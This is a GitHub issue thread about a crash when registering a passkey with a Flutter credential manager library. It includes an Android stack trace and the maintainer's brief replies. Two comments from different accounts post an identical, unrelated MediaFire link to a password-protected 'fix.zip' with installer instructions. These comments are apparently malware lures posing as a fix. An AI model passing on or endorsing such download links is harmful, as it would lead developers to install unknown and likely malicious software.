### ISSUE TITLE
null reference on registering new passkey 

### ISSUE THREAD

**Issue by federicomalagoni** [Djsmk123/flutter_credential_manager_compose#24]
**Describe the bug**
When I try to register a passkey the library after showing me the credential view crash.

**To Reproduce**

Inserted the username and the password.
Clicked "Register with pass key"
It shows correctly the password screen, when I type the password and I click confirm the app suddenly crash.  

This is the console log:

W/Parcel  (27148): Expecting binder but got null!
D/EGL_emulation(27148): app_time_stats: avg=15979.87ms min=15979.87ms max=15979.87ms count=1
D/AutofillManager(27148): Fill dialog is enabled:false, hints=[password, passwordAuto, creditCardNumber, creditCardSecurityCode, creditCardExpirationDate]
D/EGL_emulation(27148): app_time_stats: avg=5.65ms min=1.11ms max=37.01ms count=50
D/EGL_emulation(27148): app_time_stats: avg=3.81ms min=1.62ms max=10.69ms count=49
D/EGL_emulation(27148): app_time_stats: avg=3.28ms min=1.86ms max=4.98ms count=48
D/EGL_emulation(27148): app_time_stats: avg=2.88ms min=1.19ms max=5.00ms count=52
D/AndroidRuntime(27148): Shutting down VM
E/AndroidRuntime(27148): FATAL EXCEPTION: main
E/AndroidRuntime(27148): Process: com.safetyeurope.drsafety, PID: 27148
E/AndroidRuntime(27148): java.lang.NullPointerException: null reference
E/AndroidRuntime(27148): 	at com.google.android.gms.common.internal.Preconditions.checkNotNull(com.google.android.gms:play-services-basement@@18.2.0:1)
E/AndroidRuntime(27148): 	at com.google.android.gms.fido.fido2.api.common.AuthenticatorAttestationResponse.<init>(com.google.android.gms:play-services-fido@@20.1.0:5)
E/AndroidRuntime(27148): 	at com.google.android.gms.fido.fido2.api.common.zzk.createFromParcel(com.google.android.gms:play-services-fido@@20.1.0:11)
E/AndroidRuntime(27148): 	at com.google.android.gms.common.internal.safeparcel.SafeParcelReader.createParcelable(com.google.android.gms:play-services-basement@@18.2.0:3)
E/AndroidRuntime(27148): 	at com.google.android.gms.fido.fido2.api.common.zzal.createFromParcel(com.google.android.gms:play-services-fido@@20.1.0:13)
E/AndroidRuntime(27148): 	at com.google.android.gms.common.internal.safeparcel.SafeParcelableSerializer.deserializeFromBytes(com.google.android.gms:play-services-basement@@18.2.0:5)
E/AndroidRuntime(27148): 	at com.google.android.gms.fido.fido2.api.common.PublicKeyCredential.deserializeFromBytes(com.google.android.gms:play-services-fido@@20.1.0:1)
E/AndroidRuntime(27148): 	at androidx.credentials.playservices.controllers.CreatePublicKeyCredential.CredentialProviderCreatePublicKeyCredentialController.handleResponse$credentials_play_services_auth_release(CredentialProviderCreatePublicKeyCredentialController.kt:157)
E/AndroidRuntime(27148): 	at androidx.credentials.playservices.controllers.CreatePublicKeyCredential.CredentialProviderCreatePublicKeyCredentialController$resultReceiver$1.onReceiveResult(CredentialProviderCreatePublicKeyCredentialController.kt:91)
E/AndroidRuntime(27148): 	at android.os.ResultReceiver$MyRunnable.run(ResultReceiver.java:50)
E/AndroidRuntime(27148): 	at android.os.Handler.handleCallback(Handler.java:942)
E/AndroidRuntime(27148): 	at android.os.Handler.dispatchMessage(Handler.java:99)
E/AndroidRuntime(27148): 	at android.os.Looper.loopOnce(Looper.java:201)
E/AndroidRuntime(27148): 	at android.os.Looper.loop(Looper.java:288)
E/AndroidRuntime(27148): 	at android.app.ActivityThread.main(ActivityThread.java:7872)
E/AndroidRuntime(27148): 	at java.lang.reflect.Method.invoke(Native Method)
E/AndroidRuntime(27148): 	at com.android.internal.os.RuntimeInit$MethodAndArgsCaller.run(RuntimeInit.java:548)
E/AndroidRuntime(27148): 	at com.android.internal.os.ZygoteInit.main(ZygoteInit.java:936)
I/Process (27148): Sending signal. PID: 27148 SIG: 9

**Screenshots**
Video attached.

Android
Flutter version 3.22.3
Smartphone (please complete the following information):

Nexus 6 API 33
Additional context
I'm using the example app provided by you.

https://github.com/user-attachments/assets/58b2f89d-2e00-4268-be44-4a57a171bda3

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by federicomalagoni** [comment]
@Djsmk123  Let me know if you can help me. Thank you

**Comment by Djsmk123** [comment]
sorry I am not getting time to check these issue. I will look into this

**Comment by federicomalagoni** [comment]
hello, do you think you will be able to get through it in the weekend?

**Comment by federicomalagoni** [comment]
hey @Djsmk123 , any news about the bug?

**Comment by federicomalagoni** [comment]
I just discovered that this bug happens only on the emulator as mentioned I'm working with an Android Emulator Nexus 6 API 33.

**Comment by Djsmk123** [comment]
I will test this on given android emulator API 33 for reproducing this issue.
